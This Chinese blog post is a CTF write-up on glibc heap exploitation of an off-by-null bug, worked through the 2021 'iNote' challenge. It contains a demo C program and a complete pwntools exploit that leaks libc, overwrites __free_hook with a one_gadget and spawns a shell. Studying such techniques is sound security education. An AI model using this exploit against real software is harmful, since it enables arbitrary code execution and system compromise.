堆进阶之仅含off by null的利用

阅读量305465

|评论1

|

发布时间 : 2021-07-09 16:30:14

 

特征标志

  • 仅存在 off by null 漏洞
  • 不能申请大于 fastbin 的堆块(可以申请也能用这种方法)如果能申请大于 fastbin 的堆块,申请 0x101 覆盖成 0x100 并控制 prev_size ,就能向低地址的堆块合并
  • 存在 scanf (或其他将 fastbin 放置到 unsortedbin 的途径)单纯 offbynull 无法在 fastbin 中利用,需要结合 unsortedbin

 

适用glibc版本

无论有无 tcache ,都能适用。

存在 tcache 则需要先将对应 size 填满,才能放入 fastbin 。

 

攻击效果

造成堆重叠(chunk extend),进而控制各类 bin 中的指针,完成 getshell

 

原理

难点在于:fastbin 堆块的 size 长度为 1 个字节(如:0xf0),如果 offbynull 覆盖 prev_inuse 时,会将整个 size 覆盖为 0x00 ,而这会引起报错。

解决思路:

  1. 利用 unsortedbin 形成时,会将其所在的前一个(高地址)非 topchunk 的堆块 prev_size 设置为 0
  2. 利用 offbynull 修改在 unsortedbin 中的空闲堆块 size ,造成空洞。将 unsortedbin 重新分配出来时,前一个堆块 prev_size=0 的状态被保留
  3. 在原来 unsortedbin 的连续空间中,在低地址处构造出 unsortedbin ,释放前一个堆块时会先后合并,重叠部分堆空间

 

Demo程序

程序有问题,等待完善

Scanf 申请的缓存区问题

#include <stdio.h>
#include <stdlib.h>

char *ptr[16];

void init(){
    setvbuf(stdin,0,2,0);
    setvbuf(stdout,0,2,0);
    setvbuf(stderr,0,2,0);
}

int main(int argc,char *argv[]){
    // init();
    char* protect;
    char buf[0x1000];

    ptr[0]=malloc(0x18);//用于offbynull
    ptr[1]=malloc(0x68);
    ptr[2]=malloc(0x68);
    ptr[3]=malloc(0x28);
    ptr[4]=malloc(0x68);//用于先后合并形成堆重叠
    protect=malloc(0x100);//防止与topchunk合并

    free(ptr[1]);
    free(ptr[2]);
    free(ptr[3]);

    /* chunk3内伪造header绕过检查 */
    *((long int*)ptr[3]+2) = 0x100;//offbynull修改后的size
    *((long int*)ptr[3]+3) = 0x10;

    /* chunk4的prev_inuse成功被设定为0 */
    scanf("%s",buf);//fastbin 2 unsortedbin

    /* off bu null,空闲堆块大小从0x110变成0x100 */
    *(ptr[0]+0x18)=0x00;

    /* 切割0x100,切割完成之后unsortedbin原来堆块没有了 */
    ptr[1]=malloc(0x68);
    ptr[2]=malloc(0x68);
    ptr[3]=malloc(0x18);

    /* 布置一个unsortedbin用于向后unlink */
    free(ptr[1]);
    free(ptr[2]);
    scanf("%s",buf);//fastbin 2 unsortedbin

    /* 向后unlink,形成堆重叠 */
    free(ptr[4]);
    scanf("%s",buf);//fastbin 2 unsortedbin

    return 0;
}

 

详细过程

  1. 如图布置出相邻的堆块:
    • chunk0 用于 offbynull ;chunk123 用于修改 chunk4 prev_inuse ;chunk4 用于向后 unlink 形成堆重叠
    • 伪造 chunk header :prev_size 为 offbynull 之后的 size

  1. 将 chunk123 释放后进入 fastbin ,然后利用 scanf 将 fastbin 的空闲堆块整理进入 unsortedbin
  2. offbynull 修改在 unsortedbin 的堆 size
  3. 然后将空闲堆块切分多次取出(因为不能申请大于 fastbin)。当申请 0x20 时,修改的是 fake header 的 prev_inuse 标志位,chunk4 prev_inuse 被保留下来
  4. 将 chunk12 重新放回 unsortedbin 后,释放 chunk4 造成向后 unlink ,形成堆重叠
  5. 造成重叠后就是常规思路利用

 

相关例题

  • [2021国赛华南赛区-iNote]
  • (libc-2.27.so)

 

例题详解

checksec

保护全开,正常堆题的保护模式基本都是全开

q@ubuntu:~/Desktop$ checksec iNote
[*] '/home/q/Desktop/iNote'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
    FORTIFY:  Enabled

main函数

main函数如下是非常常规的菜单类题目,漏洞点存在于edit函数中,因篇幅关系,下面只放上edit函数代码

void __fastcall main(__int64 a1, char **a2, char **a3)
{
  __int64 v3[5]; // [rsp+0h] [rbp-28h] BYREF

  v3[1] = __readfsqword(0x28u);
  my_init();
  while ( 1 )
  {
    puts("1. allocate");
    puts("2. edit");
    puts("3. show");
    puts("4. delete");
    puts("5. exit");
    __printf_chk(1LL, "Your choice: ");
    __isoc99_scanf(&aLd, v3);
    switch ( v3[0] )
    {
      case 1LL:
        add();
        break;
      case 2LL:
        edit();                                 // off by null
        break;
      case 3LL:
        show();
        break;
      case 4LL:
        delete();
        break;
      case 5LL:
        exit(0);
      default:
        puts("Unknown");
        break;
    }
  }
}

edit函数

漏洞代码

在如下部分代码中,当我们对chunk进行编辑完成的时候输入’\n’,程序会将其替换为’”\x00”,从而造成了off by null漏洞的生成

do
      {
        read(0, v4, 1uLL);
        if ( *v4 == '\n' )
        {
          *v4 = 0;
          goto LABEL_8;
        }
unsigned __int64 edit()
{
  unsigned __int64 v0; // rbx
  __int64 ptr; // r12
  __int64 size; // rbp
  _BYTE *v3; // rbp
  _BYTE *v4; // rbx
  _BYTE *v5; // rax
  __int64 v6; // rax
  unsigned __int64 v8; // [rsp+0h] [rbp-28h] BYREF
  unsigned __int64 v9; // [rsp+8h] [rbp-20h]

  v9 = __readfsqword(0x28u);
  __printf_chk(1LL, "Index: ");
  __isoc99_scanf(&aLd, &v8);
  v0 = v8;
  if ( v8 <= 0xF && ptr_list[v8] )
  {
    __printf_chk(1LL, "Content: ");
    ptr = ptr_list[v0];
    size = size_list[v0];
    if ( size )                                 // off by null
    {
      v3 = (_BYTE *)(ptr + size);
      v4 = (_BYTE *)ptr_list[v0];
      do
      {
        read(0, v4, 1uLL);
        if ( *v4 == '\n' )
        {
          *v4 = 0;
          goto LABEL_8;
        }
        v5 = v4++;
        v6 = (__int64)&v5[-ptr + 1];
      }
      while ( v4 != v3 );
      v4 = (_BYTE *)(ptr + v6);
    }
    else
    {
      v4 = (_BYTE *)ptr_list[v0];
    }
LABEL_8:
    *v4 = 0;
  }
  return __readfsqword(0x28u) ^ v9;
}

思路概述

该题目libc版本为2.27,且仅有off bu null这一个漏洞。

第一步,填充完毕tcache,将构建好的chunk放置于fastbin,再利用scanf输入长字符串触发malloc_consolidate ,将fastbin整理到unsortedbin中,进行libc_base的泄露。

第二步,利用off by null漏洞修改chunk size 的prev_inuse=0,

结合伪造 header 、offbynull 向后unlink制造堆重叠。

第三步,常规攻击打’__free_hook’,传入onegadget去getshell。

第一步实操

1.1
#unsortedbin泄露libc地址
for i in range(8):
    add(i,0x78)

add(8,0x58)#后面offbynull构造0x110
add(9,0x20)#后面offbynull构造0x110
for i in list(range(8)):#tcache填充
    delete(i)
p.sendlineafter("choice: ",'1'*0x7000)#fastbin 2 unsortedbin 触发malloc_consolidate 
for i in list(range(7))[::-1]:
    add(i,0x78)
add(7,0x78)
show(7)
#gdb.attach(p)
p.recvuntil("Content: ")
main_arean_208 = u64(p.recv(6).ljust(8,'\x00'))
log.info("main_arean_208:"+hex(main_arean_208))
libc_base = main_arean_208 - 208 - (0x7ffff7dcdc40-0x7ffff79e2000)
log.info("libc_base:"+hex(libc_base))

7号chunk中的内容

pwndbg> x/32gx 0x558c496305d0
0x558c496305d0:    0x0000000000000000    0x0000000000000081
0x558c496305e0:    0x00007f2cb69bcd10    0x00007f2cb69bcd10
0x558c496305f0:    0x0000000000000000    0x0000000000000000

第二步实操

2.1

构造一个0x110的(0x70+0x60+0x30)unsortedbin,同时伪造一个header,用来向前合并造成堆重叠,并利用off by null 修改

0x110的chunk size为0x100

for i in list(range(7)):
    delete(i)
delete(7)#0x68

for i in range(7):
    add(i,0x58)
for i in list(range(7)):
    delete(i)
delete(8)#0x58

for i in list(range(7)):
    add(i,0x20)
for i in list(range(7)):
    delete(i)
edit(9,"QAQ.QVQ."*2+p64(0x100)+p64(0x10))#伪造一个header,用来向前(低地址)合并造成堆重叠
gdb.attach(p)
delete(9)#0x20
#gdb.attach(p)
p.sendlineafter("choice: ",'1'*0x7000)#fastbin 2 unsortedbin
#gdb.attach(p)
#off by null将0x110覆盖为0x100
add(11,0x78)#head:用于off by null溢出修改size(0x110->0x100)
#gdb.attach(p)
edit(11,'a'*0x78)

9号chunk填充完毕的状态如下

pwndbg> x/32gx 0x556e6dcc56b0
0x556e6dcc56b0:    0x0000000000000000    0x0000000000000031
0x556e6dcc56c0:    0x2e5156512e514151    0x2e5156512e514151
0x556e6dcc56d0:    0x0000000000000100    0x0000000000000010

再次触发malloc_consolidate 和off by null后chunk的排布如下

0x56299f4065d0      0x6161616161616161  0x100                Freed     0x7f01a7875da0    0x7f01a7875da0
0x56299f4066d0      0x100               0x10                 Freed              0x110              0x60

如上主要部分,我们已经成功获得chunk size为0x100的chunk,同时prev_size=0x110;prev_inuse=0任然保持

pwndbg> parseheap
addr                prev                size                 status              fd                bk                
0x56299f406000      0x0                 0x250                Used                None              None
0x56299f406250      0x0                 0x80                 Freed                0x0              None
0x56299f4062d0      0x0                 0x80                 Freed     0x56299f406260              None
0x56299f406350      0x0                 0x80                 Freed     0x56299f4062e0              None
0x56299f4063d0      0x0                 0x80                 Freed     0x56299f406360              None
0x56299f406450      0x0                 0x80                 Freed     0x56299f4063e0              None
0x56299f4064d0      0x0                 0x80                 Freed     0x56299f406460              None
0x56299f406550      0x0                 0x80                 Freed 0x61616161616161610x6161616161616161
0x56299f4065d0      0x6161616161616161  0x100                Freed     0x7f01a7875da0    0x7f01a7875da0
0x56299f4066d0      0x100               0x10                 Freed              0x110              0x60
0x56299f4066e0      0x110               0x60                 Freed                0x0              None
0x56299f406740      0x3131313131313131  0x60                 Freed     0x56299f4066f0              None
0x56299f4067a0      0x3131313131313131  0x60                 Freed     0x56299f406750              None
0x56299f406800      0x3131313131313131  0x60                 Freed     0x56299f4067b0              None
0x56299f406860      0x3131313131313131  0x60                 Freed     0x56299f406810              None
0x56299f4068c0      0x3131313131313131  0x60                 Freed     0x56299f406870              None
0x56299f406920      0x3131313131313131  0x60                 Freed     0x56299f4068d0              None
0x56299f406980      0x3131313131313131  0x30                 Freed                0x0              None
0x56299f4069b0      0x3131313131313131  0x30                 Freed     0x56299f406990              None
0x56299f4069e0      0x3131313131313131  0x30                 Freed     0x56299f4069c0              None
0x56299f406a10      0x3131313131313131  0x30                 Freed     0x56299f4069f0              None
0x56299f406a40      0x3131313131313131  0x30                 Freed     0x56299f406a20              None
0x56299f406a70      0x3131313131313131  0x30                 Freed     0x56299f406a50              None
0x56299f406aa0      0x3131313131313131  0x30                 Freed     0x56299f406a80              None
2.2

在如下部分chunk(0x110)后面布置一个chunk用来实现unlink造成堆重叠。

0x56299f4066d0      0x100               0x10                 Freed              0x110              0x60

接着将0x100的chunk从unsortedbin之中分割出来一部分(0x78+0x58+0x10)

【在上面的0x56299f4066d0这部分chunk中我们在步骤2.1中已经完成他的chunk size修改成了0x10所以分割unsortedbin时候可以正常分割0x10大小的chunk。】

unsortedbin 中还剩余 0x20 空间,与下一个 chunk 相差了 0x10 ,我们提前在这 0x10 中伪造 header ,当分配后修改的是 fake header prev_inuse 下一个 chunk 的 prev_inuse 被正常保留,可以用于 unlink 制造重叠空间

#0x110后面布置一个堆块,用于unlink造成堆重叠
for i in range(6):
    add(i,0x58)
add(12,0x58)#tail:unlink

for i in range(6):#清空堆指针列表,方便后续操作
    delete(i)

#将0x100切分分配出来0x78+0x58+0x10
for i in range(6):
    add(i,0x78)
add(8,0x78)
for i in range(6):
    delete(i)
for i in range(6):
    add(i,0x58)
add(9,0x58)
for i in range(6):
    delete(i)
add(10,0x10)
#gdb.attach(p)

2.2步骤完成后的chunk内容如下

pwndbg> x/10gx 0x55d6f7eeb6b0
0x55d6f7eeb6b0:    0x0000000000000000    0x0000000000000021
0x55d6f7eeb6c0:    0x0000000000000000    0x0000000000000000
0x55d6f7eeb6d0:    0x0000000000000020    0x0000000000000011
0x55d6f7eeb6e0:    0x0000000000000110    0x0000000000000060
0x55d6f7eeb6f0:    0x0000000000000000    0x0000000000000000

在这部分chunk中prev_inuse以及prev_size都被保留了下来

0x55d6f7eeb6e0:    0x0000000000000110    0x0000000000000060
2.3

然后将 0x78+0x58 放回到 unsortedbin ,释放 0x110 后面的堆块就会向前合并,即 unsortedbin 里面变成 0x110 + 0x110 后面的堆 size 。

for i in range(7):
    add(i,0x78)
for i in range(7):
    delete(i)
delete(8)#fastbin
for i in range(7):
    add(i,0x58)
for i in range(7):
    delete(i)
delete(9)#fastbin

p.sendlineafter("choice: ",'1'*0x7000)
gdb.attach(p)

合并完成后的chunk如下,我们可以清楚的看见chunk size成功合并为0xe0大小同时prev_inuse 也变成了1

pwndbg> x/8gx 0x55b336b405d0 
0x55b336b405d0:    0x6161616161616161    0x00000000000000e1
0x55b336b405e0:    0x00007f3aeb0d1d70    0x00007f3aeb0d1d70
0x55b336b405f0:    0x0000000000000000    0x0000000000000000
0x55b336b40600:    0x0000000000000000    0x0000000000000000

接着进行堆重叠

delete(12)
p.sendlineafter("choice: ",'1'*0x7000)

重叠部分的chunk如下

pwndbg> x/32gx 0x55b67f11d6b0
0x55b67f11d6b0:    0x00000000000000e0    0x0000000000000020
0x55b67f11d6c0:    0x0000000000000000    0x0000000000000000

第三步实操

3.1

直接利用重叠部分chunk攻打free_hook

for i in range(7):
    add(i,0x78)
add(8,0x78)
for i in range(7):
    delete(i)
for i in range(7):
    add(i,0x58)
add(9,0x58)
for i in range(7):
    delete(i)
for i in range(7):
    add(i,0x20)
add(12,0x20)#hacker

for i in range(7):
    delete(i)

for i in range(7):
    add(i,0x20)

delete(10)

edit(12,p64(libc_base+libc.sym['__free_hook'])+'\n')

add(14,0x20)

add(15,0x20)

edit(15,p64(libc_base+0x4f432)+'\n')

delete(0)

p.interactive()

 

EXP

#encoding:utf-8
from pwn import *
context.log_level='debug'

p = process("./iNote")

libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

def add(id,size):
    p.sendlineafter("choice: ",str(1))
    p.sendlineafter("Index: ",str(id))
    p.sendlineafter("Size: ",str(size))
def edit(id,content):
    p.sendlineafter("choice: ",str(2))
    p.sendlineafter("Index: ",str(id))
    p.sendafter("Content: ",content)
def show(id):
    p.sendlineafter("choice: ",str(3))
    p.sendlineafter("Index: ",str(id))
def delete(id):
    p.sendlineafter("choice: ",str(4))
    p.sendlineafter("Index: ",str(id))

#unsortedbin泄露libc地址
for i in range(8):
    add(i,0x78)

add(8,0x58)#后面offbynull构造0x110
add(9,0x20)#后面offbynull构造0x110

for i in list(range(8)):
    delete(i)

p.sendlineafter("choice: ",'1'*0x7000)#fastbin 2 unsortedbin

for i in list(range(7))[::-1]:
    add(i,0x78)

add(7,0x78)
show(7)

p.recvuntil("Content: ")
main_arean_208 = u64(p.recv(6).ljust(8,'\x00'))
log.info("main_arean_208:"+hex(main_arean_208))
libc_base = main_arean_208 - 208 - (0x7ffff7dcdc40-0x7ffff79e2000)
log.info("libc_base:"+hex(libc_base))

# off by null 构造重叠区域

# 构造0x110(0x70+0x60+0x30)的unsortedbin
# unlink时会将0x110后面堆修改为:prev_size=0x110;prev_inuse=0;
for i in list(range(7)):
    delete(i)
delete(7)#0x68

for i in range(7):
    add(i,0x58)
for i in list(range(7)):
    delete(i)
delete(8)#0x58

for i in list(range(7)):
    add(i,0x20)
for i in list(range(7)):
    delete(i)
edit(9,"QAQ.QVQ."*2+p64(0x100)+p64(0x10))#伪造一个header,用来向前(低地址)合并造成堆重叠

delete(9)#0x20

p.sendlineafter("choice: ",'1'*0x7000)#fastbin 2 unsortedbin

#off by null将0x110覆盖为0x100
add(11,0x78)#head:用于off by null溢出修改size(0x110->0x100)
edit(11,'a'*0x78)


#0x110后面布置一个堆块,用于unlink造成堆重叠
for i in range(6):
    add(i,0x58)
add(12,0x58)#tail:unlink

for i in range(6):#清空堆指针列表,方便后续操作
    delete(i)

#将0x100切分分配出来0x78+0x58+0x10
for i in range(6):
    add(i,0x78)
add(8,0x78)
for i in range(6):
    delete(i)
for i in range(6):
    add(i,0x58)
add(9,0x58)
for i in range(6):
    delete(i)
add(10,0x10)

#然后将 0x78+0x58 放回到 unsortedbin ,释放 0x110 后面的堆块就会向前合并,即 unsortedbin 里面变成 0x110 + 0x110 后面的堆 size 。
for i in range(7):
    add(i,0x78)
for i in range(7):
    delete(i)
delete(8)#fastbin
for i in range(7):
    add(i,0x58)
for i in range(7):
    delete(i)
delete(9)#fastbin

p.sendlineafter("choice: ",'1'*0x7000)

# 堆重叠
delete(12)

p.sendlineafter("choice: ",'1'*0x7000)

#free_hook attack
for i in range(7):
    add(i,0x78)
add(8,0x78)
for i in range(7):
    delete(i)
for i in range(7):
    add(i,0x58)
add(9,0x58)
for i in range(7):
    delete(i)
for i in range(7):
    add(i,0x20)
add(12,0x20)#hacker

for i in range(7):
    delete(i)

for i in range(7):
    add(i,0x20)

delete(10)

edit(12,p64(libc_base+libc.sym['__free_hook'])+'\n')

add(14,0x20)

add(15,0x20)

edit(15,p64(libc_base+0x4f432)+'\n')

delete(0)

p.interactive()

getshell成功

[*] Switching to interactive mode
$ cat flag
[DEBUG] Sent 0x9 bytes:
    'cat flag\n'
[DEBUG] Received 0x1a bytes:
    'flag{QAQ_I_am_local_flag}\n'
flag{QAQ_I_am_local_flag}
$

本文由H.R.P原创发布

转载,请参考转载声明,注明出处: https://www.anquanke.com/post/id/245453

安全客 - 有思想的安全新媒体

分享到:微信
+13赞
收藏
H.R.P
分享到:微信

发表评论

内容需知
合作单位
  • 安全客
  • 安全客
Copyright © 北京奇虎科技有限公司 三六零数字安全科技集团有限公司 安全客 All Rights Reserved 京ICP备08010314号-66